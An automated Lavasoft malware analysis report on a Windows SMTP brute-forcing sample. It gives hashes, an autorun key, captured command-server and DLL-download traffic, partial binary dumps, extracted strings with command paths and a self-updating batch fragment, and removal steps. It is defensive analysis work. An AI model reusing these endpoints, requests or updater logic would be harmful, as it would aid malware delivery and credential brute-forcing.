Sample_ebb4f8b43f

mzpefinder_pcap_file.YR (Lavasoft MAS) Behaviour: Malware The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information....
Blog rating:1.5 out of5 with2 ratings

Sample_ebb4f8b43f

by malwarelabrobot on September 4th, 2017 in Malware Descriptions.

mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Malware


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: ebb4f8b43fb78610e9757cf16387454a
SHA1: 7231881b7dc2194d6989184833f86484d1df15e7
SHA256: e8e4251f0f5abe9ca7a0bd10bd1fca9066fc93e17756423a6ea694ecfb8748c4
SSDeep: 6144:6zg1Uk NeeeeeeenI5CXT6BSHuoazrpPkf3CRrnpDq:6JNeeeeeeenI5Cj/gZkf3CRrx
Size: 279552 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: StdLib
Created at: 2012-07-26 17:06:56
Analyzed on: Windows7 SP1 32-bit


Summary:

Malware. Malware, short for malicious software, is any software used to disrupt computer operation, gather sensitive information, or gain access to private computer systems.

Payload

No specific payload has been found.

Process activity

The Malware creates the following process(es):
No processes have been created.
The Malware injects its code into the following process(es):

%original file name%.exe:2928

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:2928 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

C:\libeay32.dll (50 bytes)
C:\ssleay32.dll (540 bytes)

Registry activity

The process %original file name%.exe:2928 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
To automatically run itself each time Windows is booted, the Malware adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"ebb4f8b43fb78610e9757cf16387454a" = "c:\%original file name%.exe"

Dropped PE files

MD5 File path
7a94e62ad54c62ecad385fddafe04304 c:\libeay32.dll
e0cd0800a00d51025968d778d0e6b2b3 c:\ssleay32.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 48228 48640 3.64813 42ccae78c14a9a31b0195dce0871b3b8
.rdata 53248 5760 6144 1.29267 47168d3682d1f082ae127bde4ea008dc
.data 61440 35282 35328 5.33302 c2a3e79f9c622879bc17d606f4fe97a2
.rsrc 98304 356352 188416 5.18231 b90400af3281643c7760deb989c89c23

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://hey.justsimpledomain.com/cmd
hxxp://hey.justsimpledomain.com/download/libeay32.dll
hxxp://hey.justsimpledomain.com/download/ssleay32.dll
smtp.googlemail.com 74.125.206.16


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY PE EXE or DLL Windows file download HTTP

Traffic

POST /cmd HTTP/1.0
Host: hey.justsimpledomain.com
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)
Content-Type: application/x-www-form-urlencoded
Content-Length: 8

status=0
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 03 Sep 2017 09:11:43 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.6.30
Cache-Control: no-cache
Set-Cookie: XSRF-TOKEN=eyJpdiI6ImoyRGdLWXRuMjZLVERPM25JUng0MWc9PSIsInZhbHVlIjoiY0l1Q1B0TW1YMVBzS0NxS0VycnI4dlU2VmRTM3NpelIxb0VNTENtS0tcL1N3bk1WR3ViZlZSRUJLQldsbmcrZWVVRUhjME9cL3dqaUVMdE9rQUlcLzJUaUE9PSIsIm1hYyI6IjU4ZDQ3OGZkNTAzMTk2ODJhOGM4MjhjNzk1ZDcwMzJlMzlkMzc4OGQyMzBmN2Q3NDczMzBiN2YyODAyZTVhY2UifQ==; expires=Sun, 03-Sep-2017 11:11:42 GMT; Max-Age=7200; path=/
Set-Cookie: laravel_session=eyJpdiI6IjhyYUhYN3N4RXZ0R2pLYVNSSzhObHc9PSIsInZhbHVlIjoidVNoMGV2YUNNVHQ2VzMwd3RLaXJZRU5EQWFGMmxzdlwvbDRKUWlJZVV1cFloUjZpMzl0MlVMcjVybXh2VTZJZjJOUkVNdU1hZHQ5V1hIUjZDb296Z1ZBPT0iLCJtYWMiOiI5OTk2OGQ3NjE2N2MwM2U5Mjg0OGE0MzAxZjA0NWYzOWM1NWVkNTEyYTdlYWFjOGNjYmJiNWVkZGJjZjlkMGU5In0=; expires=Sun, 03-Sep-2017 11:11:42 GMT; Max-Age=7200; path=/; httponly



GET /download/ssleay32.dll HTTP/1.0
Host: hey.justsimpledomain.com
Keep-Alive: 300
Connection: keep-alive
Cookie: XSRF-TOKEN=eyJpdiI6InJUVnNrUjlJTGdPNUVpRkdsSUc4RkE9PSIsInZhbHVlIjoiQnJHcWoyYVlwUmlwSjJHc1wvcFZQSGpJXC80UHdlNlFLb0Vmd2R3Nit6MTZNOWpqaWdYakZQOVB6Q0p6R0E1Q09IXC8yUm1vdTBRQmdrRmQxdnFpNXpVUVE9PSIsIm1hYyI6Ijc2NTU2MTQ1MWNjNDZlYTIxODIyZmRkNDc1N2UxY2NkNzVlMmRiMjIzNjUwMjk3YTFhZDIzYTlkYjg1ZDA1OTcifQ==; laravel_session=eyJpdiI6IjJFN3lKK2RFeVJncCt1R1BpaU5zbGc9PSIsInZhbHVlIjoidjE0NnZsZnZWejZISEdGKzJBZzhzdFNNOEhnS0hUSTVGYURneFwvdE9jM2luUGtUN1JOSExtSTJqWWVrUHV4OExFckZISzhCMVwvSlwvVm9NcDNWaWdkdHc9PSIsIm1hYyI6Ijg2YTBjMTBlNTRlMzkyZjEzYjhjMjYxM2VlYTU2ZTUxMmE1NzMyMzkzZmVmZGZhODUzY2ZiNzUyZjU0ZWQ1ZDQifQ==
User-Agent: Mozilla/4.0 (compatible; Synapse)


HTTP/1.1 200 OK
Server: nginx
Date: Sun, 03 Sep 2017 09:11:45 GMT
Content-Type: application/x-dosexec
Content-Length: 270336
Connection: keep-alive
X-Powered-By: PHP/5.6.30
Cache-Control: public
Last-Modified: Sun, 09 Jul 2017 00:26:18 GMT
Content-Disposition: attachment; filename="ssleay32.dll"
Accept-Ranges: bytes
Set-Cookie: XSRF-TOKEN=eyJpdiI6IlpoN3lXTGF1YlUxYTBhYlk4Znhkd1E9PSIsInZhbHVlIjoiUkxqWHJ0Y0g5VDA4b0FhRTRRSlBZd0t4SFpZSVFDbVpFaUVRRjRSYTc2VWxvR1FGXC9yTnh0R0lwR2JkYk9CV1BzWnlzUzlDZFFjbnlHR1VMdXZQOHdBPT0iLCJtYWMiOiJjNjhhYzAxYzc0NjgwNTUwNzIzMGU2ZWRmMDY2MmQ0ZWY5ZjQ5MDc5YjcxNTVjZGRlNjJhZGFjYTIzMDc3ZmYyIn0=; expires=Sun, 03-Sep-2017 11:11:44 GMT; Max-Age=7200; path=/
Set-Cookie: laravel_session=eyJpdiI6ImFjMk5DRFVaRDN5ZXczaWduNVJhc3c9PSIsInZhbHVlIjoiaGJZVVBHV3pZbEt6YXZUd29HelUwVVAxdUU5dG9IUU9kYkxrb2kwb1VXcEhPWW5yekhZaVFqcWRvbnYySWd4S3U0N3pUaHNHeEN1K1UzT1k4MUxxWHc9PSIsIm1hYyI6ImQ5NGE2NTgxYTU2MTYxMTdkOGVlN2M4MmM5ODlkNjYyNzJjNTBmODIxMzI1YmY0MzZmNDY3OWVmZmQxOWU3YWYifQ==; expires=Sun, 03-Sep-2017 11:11:44 GMT; Max-Age=7200; path=/; httponly
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$........y4.D.Z.D.Z.
D.Z.M`..G.Z.M`..F.Z.M`..C.Z.D.[...Z.M`..y.Z.M`..E.Z.M`..E.Z.M`..E.Z.Ri
chD.Z.........................PE..L.....DS...........!................
......... ...............................`......R.....................
..............p$..L...P.... .......................0..|#..0&..........
....................(...@............ ...............................t
ext............................... ..`.rdata..@.... ..................
....@..@.data....1..........................@....rsrc........ ........
..............@..@.reloc..~$...0...&..................@..B............
......................................................................
......................................................................
......................................................................
......................................................................
............................................3..|$.....H%P&............
.......P&.............3..|$.....H%.&.............................~4. .
... ..u............F4.N<W.y.9F4.......FD..... .R..PV.g>....... N
D...;.}.PjjV..?....._Y..FD......G...tP....t)j.V.<2..h(...h<'..h.
...jjj............_Y.h ...h<'..h....jjj............_Y......O.......
..;.}........W..NT.............G...W..NT................G...W..NT.....
....Ad......wX.F4. ...FT.V<............S.Z..PdU.l.....?..vTj.V.d1..
hC...h<'..h(...jjj..,......][..._Y.j.V.91..h7...h<'..h....jj
<<< skipped >>>


GET /download/libeay32.dll HTTP/1.0
Host: hey.justsimpledomain.com
Keep-Alive: 300
Connection: keep-alive
Cookie: XSRF-TOKEN=eyJpdiI6ImoyRGdLWXRuMjZLVERPM25JUng0MWc9PSIsInZhbHVlIjoiY0l1Q1B0TW1YMVBzS0NxS0VycnI4dlU2VmRTM3NpelIxb0VNTENtS0tcL1N3bk1WR3ViZlZSRUJLQldsbmcrZWVVRUhjME9cL3dqaUVMdE9rQUlcLzJUaUE9PSIsIm1hYyI6IjU4ZDQ3OGZkNTAzMTk2ODJhOGM4MjhjNzk1ZDcwMzJlMzlkMzc4OGQyMzBmN2Q3NDczMzBiN2YyODAyZTVhY2UifQ==; laravel_session=eyJpdiI6IjhyYUhYN3N4RXZ0R2pLYVNSSzhObHc9PSIsInZhbHVlIjoidVNoMGV2YUNNVHQ2VzMwd3RLaXJZRU5EQWFGMmxzdlwvbDRKUWlJZVV1cFloUjZpMzl0MlVMcjVybXh2VTZJZjJOUkVNdU1hZHQ5V1hIUjZDb296Z1ZBPT0iLCJtYWMiOiI5OTk2OGQ3NjE2N2MwM2U5Mjg0OGE0MzAxZjA0NWYzOWM1NWVkNTEyYTdlYWFjOGNjYmJiNWVkZGJjZjlkMGU5In0=
User-Agent: Mozilla/4.0 (compatible; Synapse)


HTTP/1.1 200 OK
Server: nginx
Date: Sun, 03 Sep 2017 09:11:43 GMT
Content-Type: application/x-dosexec
Content-Length: 1177088
Connection: keep-alive
X-Powered-By: PHP/5.6.30
Cache-Control: public
Last-Modified: Sun, 09 Jul 2017 00:26:18 GMT
Content-Disposition: attachment; filename="libeay32.dll"
Accept-Ranges: bytes
Set-Cookie: XSRF-TOKEN=eyJpdiI6InJUVnNrUjlJTGdPNUVpRkdsSUc4RkE9PSIsInZhbHVlIjoiQnJHcWoyYVlwUmlwSjJHc1wvcFZQSGpJXC80UHdlNlFLb0Vmd2R3Nit6MTZNOWpqaWdYakZQOVB6Q0p6R0E1Q09IXC8yUm1vdTBRQmdrRmQxdnFpNXpVUVE9PSIsIm1hYyI6Ijc2NTU2MTQ1MWNjNDZlYTIxODIyZmRkNDc1N2UxY2NkNzVlMmRiMjIzNjUwMjk3YTFhZDIzYTlkYjg1ZDA1OTcifQ==; expires=Sun, 03-Sep-2017 11:11:43 GMT; Max-Age=7200; path=/
Set-Cookie: laravel_session=eyJpdiI6IjJFN3lKK2RFeVJncCt1R1BpaU5zbGc9PSIsInZhbHVlIjoidjE0NnZsZnZWejZISEdGKzJBZzhzdFNNOEhnS0hUSTVGYURneFwvdE9jM2luUGtUN1JOSExtSTJqWWVrUHV4OExFckZISzhCMVwvSlwvVm9NcDNWaWdkdHc9PSIsIm1hYyI6Ijg2YTBjMTBlNTRlMzkyZjEzYjhjMjYxM2VlYTU2ZTUxMmE1NzMyMzkzZmVmZGZhODUzY2ZiNzUyZjU0ZWQ1ZDQifQ==; expires=Sun, 03-Sep-2017 11:11:43 GMT; Max-Age=7200; path=/; httponly
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$........XE..9 ..9 .
.9 ..A...9 ..A...9 ..9*..9 ..A...9 ..9 ..9 ..A...; ..A...9 ..A...9 ..A
...9 .Rich.9 .........................PE..L.....DS...........!........
........,........................................P....................
...................b..Q....W..................................l.......
.............................V..@.....................................
.......text............................... ..`.rdata..................
............@..@.data............^..................@....rsrc.........
.......R..............@..@.reloc...............Z..............@..B....
......................................................................
......................................................................
......................................................................
......................................................................
............................................hhl..h.....a......j.......
............&....D$.SU.l$.VWUPh ...h....hhl...D$$............hl....l..
..............f.......uVP........uF..........................S........
C..K....l.......S..D$..L$._^...][Y...l....l.....;.t....l..........h...
.P........uL.........................K.f.......S........C..D$.f.K..L$.
_.5.l...S.^...][Y.....u9..........................C..D$..K..L$._.5.l..
.S.^...][Y...l......l..;(.......u..D$..T$._^...][Y..T$..D$._^...][Y...
..j.h.....T.......%...............j.h.....4.......%...............
<<< skipped >>>






The Malware connects to the servers at the folowing location(s):







%original file name%.exe_2928:




`.rsrc
Ca.in
d.MThe
TArray<System.Byte>
TArray<System.Char>
System.Types
!"#$%&'(!)* ,-./0'
* ,-./01234
System.SysUtils
ENoMonitorSupportException
TFormatSettings.TEraInfo
TArray<System.string>
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
System.SysUtilsL
&TArray<System.SysUtils.TUnitHashEntry>
Uh.AB
iMaxUdpDg
sin_port
sin6_port
0.0.0.0
127.0.0.1
255.255.255.255
getservbyport
THookVerifyCert
LT_SSHv2
Port
ResolvePort
GetLocalSinPort
GetRemoteSinPort
FSocksPort
FSocksPassword
FSocksResponsePort
FSocksLocalPort
FSocksRemotePort
FBypassFlag
SocksPort
SocksPassword
FHTTPTunnelIP
FHTTPTunnelPort
FHTTPTunnel
FHTTPTunnelRemoteIP
FHTTPTunnelRemotePort
FHTTPTunnelUser
FHTTPTunnelPass
FHTTPTunnelTimeout
TTCPBlockSocket&
TTCPBlockSocket
HTTPTunnelIP
HTTPTunnelPort
HTTPTunnelUser
HTTPTunnelPass
HTTPTunnelTimeout
HTTPTunnel
TUDPBlockSocket'
TUDPBlockSocket
FOnVerifyCert
FKeyPassword
FCertificateFile
FPrivateKeyFile
FCertificate
FPrivateKey
FCertCA
FCertCAFile
FTrustCertificate
FTrustCertificateFile
FVerifyCert
FPassword
FSSHChannelType
FSSHChannelArg1
FSSHChannelArg2
FCertComplianceLevel
GetCertInfo
GetVerifyCert
KeyPassword
Password
CertificateFile
PrivateKeyFile(
Certificate(
PrivateKey(
TrustCertificateFile(
TrustCertificate(
CertCA
CertCAFile
VerifyCert
SSHChannelType
SSHChannelArg1
SSHChannelArg2
CertComplianceLevelT
OnVerifyCert
FTargetPort
TargetPort
httpsendex
FAlivePort
FProxyPort
FProxyPass
FAddPortNumberToHost
THTTPSend,
HTTPMethod
THTTPSend(9C
ProxyPort
ProxyPass
AddPortNumberToHost
FESMTPcap
FESMTP
FESMTPSize
FFirstMsg
TSMTPSend&
Login
TSMTPSend
smtpsendex
ESMTPcap
ESMTP
ESMTPSize
FirstMsg
AUTH LOGIN
FSMTPSend
FHTTP
TMessHeader&
TMessHeader<
TMessHeaderClass
GetAdditionalSmtp
FTCPSock
FUseTCP
TCPSock
UseTCP
.in-addr.arpa
.ip6.arpa
FSMTP
SMTP
smtp=
FCmdEvent
FLastCmdDate
FLastCmdDateCS
FCmdParams
TCmdGet?
TCmdGetH
cmdget
LastCmdDate
System.RTLConsts
System.SysConst
System.Internal.ExcUtils
System.Character
Winapi.Windows
System.UITypes
Winapi.PsAPI
Winapi.SHFolder
Winapi.ImageHlp
System.StrUtils
Winapi.ShellAPI
Winapi.IpExport
Winapi.Winsock2
Winapi.Qos
Winapi.Messages
Winapi.WinSock
%$%,%4%<%
S%T%U%V%W%X%Y%Z%[%\%]%^%_%`%a%
b%c%d%e%f%g%h%i%j%k%l%
%$%a%b%V%U%c%Q%W%]%\%[%
%<%^%_%Z%T%i%f%`%P%l%g%h%d%e%Y%X%R%S%k%j%
Z%T%i%f%`%P%l%
DBv}.BvsuAv{ Bv
kernel32.dll
user32.dll
Silent_SMTP_Bruter.exe
Embarcadero Delphi for Win32 compiler version 30.0 (23.0.20618.2753)
Silent_SMTP_Bruter
dSystem.SysConst
ISystem.Internal.ExcUtils
,System.Character
kWinapi.PsAPI
-Winapi.ImageHlp
System.StrUtils
"Winapi.WinSock
GetCPInfoExW
GetCPInfo
RegOpenKeyExW
RegCloseKey
ShellExecuteW
.text
`.itext
`.data
.idata
.didata
.edata
@.tls
.rdata
@.rsrc
S%T%U%V%W%X%Y%Z%[%\%]%^%_%`%
b%c%d%e%f%g%h%i%j%k%l%VB 
(32.dll
.20618753)
KERNEL32.DLL
advapi32.dll
netapi32.dll
oleaut32.dll
shell32.dll
version.dll
%s, %d %s %s %s
HTTPS
%d.%d.%d.%d
ws2_32.dll
owship6.dll
Synapse TCP/IP Socket error %d: %s
Operation would block
Operation now in progress
Operation already in progress
Socket operation on nonsocket
Protocol not supported
Socket not supported
Operation not supported on Socket
Protocol family not supported
Address family not supported
Winsock DLL cannot support this application
0.0.0.1
HTTP/1.0
HTTP/
SSL/TLS support is not compiled!
Without SSL support
Mozilla/4.0 (compatible; Synapse)
HTTP/
LOGIN
smtp.­dr%
smtp://
application/x-www-form-urlencoded
iconv.dll
KAMENICKY
[pass]
IPHLPAPI.DLL
System\CurrentControlSet\Services\Tcpip\Parameters\Temporary
System\CurrentControlSet\Services\Tcpip\Parameters
System\CurrentControlSet\Services\MSTCP
Synapse - Pascal TCP/IP library by Lukas Gebauer
login failed :
smtp.googlemail.com
cmd/emails
cmd/smtp
cmd/limit-smtp
smtpcheckres
login.txt
cmd/verify-emails
ssleay32.dll
libssl32.dll
libeay32.dll
SSL_CTX_use_PrivateKey
SSL_CTX_use_PrivateKey_ASN1
SSL_CTX_use_RSAPrivateKey_file
SSL_CTX_use_certificate
SSL_CTX_use_certificate_ASN1
SSL_CTX_use_certificate_file
SSL_CTX_use_certificate_chain_file
SSL_CTX_check_private_key
SSL_CTX_set_default_passwd_cb
SSL_CTX_set_default_passwd_cb_userdata
SSL_get_peer_certificate
X509_set_pubkey
EVP_PKEY_new
EVP_PKEY_free
EVP_PKEY_assign
RSA_generate_key
i2d_PrivateKey_bio
DES_set_key_checked
status=%s
download/libeay32.dll
download/ssleay32.dll
upd.tmp
upd.bat
set fl="%s"
del /q %%fl%%
if exist %%fl%% goto dl
move /y "%s" %%fl%%
start "" %%fl%%
Error loading Socket interface (ws2_32.dll)!
US-ASCII ANSI_X3.4-1968 ANSI_X3.4-1986 ASCII CP367 IBM367 ISO-IR-6 ISO646-US ISO_646.IRV:1991 US CSASCII USASCII ISOIR6
WINDOWS-1250 CP1250 MS-EE WINDOWS1250 MSEE
WINDOWS-1251 CP1251 MS-CYRL WINDOWS1251 MSCYRL
WINDOWS-1252 CP1252 MS-ANSI WINDOWS1252 MSANSI
WINDOWS-1253 CP1253 MS-GREEK WINDOWS1253 MSGREEK
WINDOWS-1254 CP1254 MS-TURK WINDOWS1254 MSTURK
WINDOWS-1255 CP1255 MS-HEBR WINDOWS1255 MSHEBR
WINDOWS-1256 CP1256 MS-ARAB WINDOWS1256 MSARAB
WINDOWS-1257 CP1257 WINBALTRIM WINDOWS1257
WINDOWS-1258 CP1258 WINDOWS1258
CP874 WINDOWS-874 WINDOWS874
SHIFT-JIS MS_KANJI SHIFT_JIS SJIS CSSHIFTJIS SHIFTJIS
Advapi32.dll
Windows
Windows Vista
Windows Server 2008
Windows 7
Windows Server 2008 R2
Windows 2000
Windows XP
Windows Server 2003
Windows Server 2003 R2
Windows Server 2012
Windows Server 2012 R2
Windows 8
Windows 8.1
Windows 10
Cannot create file "%s". %s
Cannot open file "%s". %s
Invalid file name - %s List capacity out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
%s.Seek not implemented
Parameter %s cannot be nil'Parameter %s cannot be a negative value*Input buffer exceeded for %s = %d, %s = %d The specified file was not found"%s (Version %d.%d, Build %d, %5:s):%s Service Pack %4:d (Version %1:d.%2:d, Build %3:d, %5:s)
Start index out of bounds (%d)
Invalid count (%d)
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Invalid variant operation
External exception %x
Interface not supported
Object lock not owned(Monitor support function not initialized
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
!'%s' is not a valid integer value
'%s' is not a valid time '%d.%d' is not a valid timestamp
I/O error %d
Integer overflow Invalid floating point operation

%original file name%.exe_2928_rwx_00401000_0006D000:




TArray<System.Byte>
TArray<System.Char>
System.Types
!"#$%&'(!)* ,-./0'
* ,-./01234
System.SysUtils
ENoMonitorSupportException
TFormatSettings.TEraInfo
TArray<System.string>
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
System.SysUtilsL
&TArray<System.SysUtils.TUnitHashEntry>
Uh.AB
iMaxUdpDg
sin_port
sin6_port
0.0.0.0
127.0.0.1
255.255.255.255
getservbyport
THookVerifyCert
LT_SSHv2
Port
ResolvePort
GetLocalSinPort
GetRemoteSinPort
FSocksPort
FSocksPassword
FSocksResponsePort
FSocksLocalPort
FSocksRemotePort
FBypassFlag
SocksPort
SocksPassword
FHTTPTunnelIP
FHTTPTunnelPort
FHTTPTunnel
FHTTPTunnelRemoteIP
FHTTPTunnelRemotePort
FHTTPTunnelUser
FHTTPTunnelPass
FHTTPTunnelTimeout
TTCPBlockSocket&
TTCPBlockSocket
HTTPTunnelIP
HTTPTunnelPort
HTTPTunnelUser
HTTPTunnelPass
HTTPTunnelTimeout
HTTPTunnel
TUDPBlockSocket'
TUDPBlockSocket
FOnVerifyCert
FKeyPassword
FCertificateFile
FPrivateKeyFile
FCertificate
FPrivateKey
FCertCA
FCertCAFile
FTrustCertificate
FTrustCertificateFile
FVerifyCert
FPassword
FSSHChannelType
FSSHChannelArg1
FSSHChannelArg2
FCertComplianceLevel
GetCertInfo
GetVerifyCert
KeyPassword
Password
CertificateFile
PrivateKeyFile(
Certificate(
PrivateKey(
TrustCertificateFile(
TrustCertificate(
CertCA
CertCAFile
VerifyCert
SSHChannelType
SSHChannelArg1
SSHChannelArg2
CertComplianceLevelT
OnVerifyCert
FTargetPort
TargetPort
httpsendex
FAlivePort
FProxyPort
FProxyPass
FAddPortNumberToHost
THTTPSend,
HTTPMethod
THTTPSend(9C
ProxyPort
ProxyPass
AddPortNumberToHost
FESMTPcap
FESMTP
FESMTPSize
FFirstMsg
TSMTPSend&
Login
TSMTPSend
smtpsendex
ESMTPcap
ESMTP
ESMTPSize
FirstMsg
AUTH LOGIN
FSMTPSend
FHTTP
TMessHeader&
TMessHeader<
TMessHeaderClass
GetAdditionalSmtp
FTCPSock
FUseTCP
TCPSock
UseTCP
.in-addr.arpa
.ip6.arpa
FSMTP
SMTP
smtp=
FCmdEvent
FLastCmdDate
FLastCmdDateCS
FCmdParams
TCmdGet?
TCmdGetH
cmdget
LastCmdDate
System.RTLConsts
System.SysConst
System.Internal.ExcUtils
System.Character
Winapi.Windows
System.UITypes
Winapi.PsAPI
Winapi.SHFolder
Winapi.ImageHlp
System.StrUtils
Winapi.ShellAPI
Winapi.IpExport
Winapi.Winsock2
Winapi.Qos
Winapi.Messages
Winapi.WinSock
%$%,%4%<%
S%T%U%V%W%X%Y%Z%[%\%]%^%_%`%a%
b%c%d%e%f%g%h%i%j%k%l%
%$%a%b%V%U%c%Q%W%]%\%[%
%<%^%_%Z%T%i%f%`%P%l%g%h%d%e%Y%X%R%S%k%j%
Z%T%i%f%`%P%l%
DBv}.BvsuAv{ Bv
kernel32.dll
user32.dll
Silent_SMTP_Bruter.exe
Embarcadero Delphi for Win32 compiler version 30.0 (23.0.20618.2753)
Silent_SMTP_Bruter
dSystem.SysConst
ISystem.Internal.ExcUtils
,System.Character
kWinapi.PsAPI
-Winapi.ImageHlp
System.StrUtils
"Winapi.WinSock
GetCPInfoExW
GetCPInfo
RegOpenKeyExW
RegCloseKey
ShellExecuteW
.text
`.itext
`.data
.idata
.didata
.edata
@.tls
.rdata
@.rsrc
S%T%U%V%W%X%Y%Z%[%\%]%^%_%`%
b%c%d%e%f%g%h%i%j%k%l%VB 
(32.dll
.20618753)
%s, %d %s %s %s
HTTPS
%d.%d.%d.%d
ws2_32.dll
owship6.dll
Synapse TCP/IP Socket error %d: %s
Operation would block
Operation now in progress
Operation already in progress
Socket operation on nonsocket
Protocol not supported
Socket not supported
Operation not supported on Socket
Protocol family not supported
Address family not supported
Winsock DLL cannot support this application
0.0.0.1
HTTP/1.0
HTTP/
SSL/TLS support is not compiled!
Without SSL support
Mozilla/4.0 (compatible; Synapse)
HTTP/
LOGIN
smtp.­dr%
smtp://
application/x-www-form-urlencoded
iconv.dll
KAMENICKY
[pass]
IPHLPAPI.DLL
System\CurrentControlSet\Services\Tcpip\Parameters\Temporary
System\CurrentControlSet\Services\Tcpip\Parameters
System\CurrentControlSet\Services\MSTCP
Synapse - Pascal TCP/IP library by Lukas Gebauer
login failed :
smtp.googlemail.com
cmd/emails
cmd/smtp
cmd/limit-smtp
smtpcheckres
login.txt
cmd/verify-emails
ssleay32.dll
libssl32.dll
libeay32.dll
SSL_CTX_use_PrivateKey
SSL_CTX_use_PrivateKey_ASN1
SSL_CTX_use_RSAPrivateKey_file
SSL_CTX_use_certificate
SSL_CTX_use_certificate_ASN1
SSL_CTX_use_certificate_file
SSL_CTX_use_certificate_chain_file
SSL_CTX_check_private_key
SSL_CTX_set_default_passwd_cb
SSL_CTX_set_default_passwd_cb_userdata
SSL_get_peer_certificate
X509_set_pubkey
EVP_PKEY_new
EVP_PKEY_free
EVP_PKEY_assign
RSA_generate_key
i2d_PrivateKey_bio
DES_set_key_checked
status=%s
download/libeay32.dll
download/ssleay32.dll
upd.tmp
upd.bat
set fl="%s"
del /q %%fl%%
if exist %%fl%% goto dl
move /y "%s" %%fl%%
start "" %%fl%%
Error loading Socket interface (ws2_32.dll)!
US-ASCII ANSI_X3.4-1968 ANSI_X3.4-1986 ASCII CP367 IBM367 ISO-IR-6 ISO646-US ISO_646.IRV:1991 US CSASCII USASCII ISOIR6
WINDOWS-1250 CP1250 MS-EE WINDOWS1250 MSEE
WINDOWS-1251 CP1251 MS-CYRL WINDOWS1251 MSCYRL
WINDOWS-1252 CP1252 MS-ANSI WINDOWS1252 MSANSI
WINDOWS-1253 CP1253 MS-GREEK WINDOWS1253 MSGREEK
WINDOWS-1254 CP1254 MS-TURK WINDOWS1254 MSTURK
WINDOWS-1255 CP1255 MS-HEBR WINDOWS1255 MSHEBR
WINDOWS-1256 CP1256 MS-ARAB WINDOWS1256 MSARAB
WINDOWS-1257 CP1257 WINBALTRIM WINDOWS1257
WINDOWS-1258 CP1258 WINDOWS1258
CP874 WINDOWS-874 WINDOWS874
SHIFT-JIS MS_KANJI SHIFT_JIS SJIS CSSHIFTJIS SHIFTJIS
Advapi32.dll
Windows
Windows Vista
Windows Server 2008
Windows 7
Windows Server 2008 R2
Windows 2000
Windows XP
Windows Server 2003
Windows Server 2003 R2
Windows Server 2012
Windows Server 2012 R2
Windows 8
Windows 8.1
Windows 10
Cannot create file "%s". %s
Cannot open file "%s". %s
Invalid file name - %s List capacity out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
%s.Seek not implemented
Parameter %s cannot be nil'Parameter %s cannot be a negative value*Input buffer exceeded for %s = %d, %s = %d The specified file was not found"%s (Version %d.%d, Build %d, %5:s):%s Service Pack %4:d (Version %1:d.%2:d, Build %3:d, %5:s)
Start index out of bounds (%d)
Invalid count (%d)
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Invalid variant operation
External exception %x
Interface not supported
Object lock not owned(Monitor support function not initialized
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
!'%s' is not a valid integer value
'%s' is not a valid time '%d.%d' is not a valid timestamp
I/O error %d
Integer overflow Invalid floating point operation

%original file name%.exe_2928_rwx_00580000_00001000:




Kernel32.dll

%original file name%.exe_2928_rwx_005A0000_00001000:




Kernel32.dll






Remove it with Ad-Aware




    

  1. Click (here) to download and install Ad-Aware Free Antivirus.
    2. 

  2. Update the definition files.
    3. 

  3. Run a full scan of your computer.
    4. 





Manual removal*




    

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):No processes have been created.
    2. 

  2. Delete the original Malware file.
    3. 

  3. Delete or disinfect the following files created/modified by the Malware:
    

    C:\libeay32.dll (50 bytes)
    C:\ssleay32.dll (540 bytes)
    

    4. 

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):
    

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "ebb4f8b43fb78610e9757cf16387454a" = "c:\%original file name%.exe"
    

    5. 

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
    6. 

  6. Reboot the computer.
    7. 



*Manual removal may cause unexpected system behaviour and should be performed at your own risk.












 
 




 
Average: 1.5 (2 votes)












				


							


			

				
					  
							

		

		


					
							

	

	
	        


	

        
      
 

      
      

      
    
 

    
  
 

		


		

		
			

			

				

					Lavasoft is the maker of Ad-Aware,
					the world's most popular anti-malware 
					software with over 450 million 
					downloads.
				

				

					© 2025 Lavasoft. All rights reserved.

					Terms Of Use |   Privacy Policy
					


								

			


		

		


